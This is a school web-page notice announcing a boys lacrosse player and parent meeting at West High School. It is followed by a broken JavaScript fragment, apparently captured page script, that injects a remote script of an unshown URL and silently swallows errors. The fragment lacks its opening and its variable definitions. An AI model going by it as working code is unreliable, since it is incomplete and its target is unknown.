Boys Lacrosse
Mark Your Calendars: Boys Lacrosse Player and Parent Meeting THIS WEEK!
All boys interested in playing West High School Boys Lacrosse this year should attend a meeting to discuss this year’s plans and activities on Wednesday, September 19th at the Community Room in the High School from 6:30 PM to 7:30 PM. We are asking all players planning on playing attend and at least one parent.
const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;
script.onload = () => { clearTimeout(timer); resolve(); };
script.onerror = () => { clearTimeout(timer); reject(); };
const timer = setTimeout(() => { script.remove(); reject(); }, timeout);
document.body.appendChild(script); }); };
await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();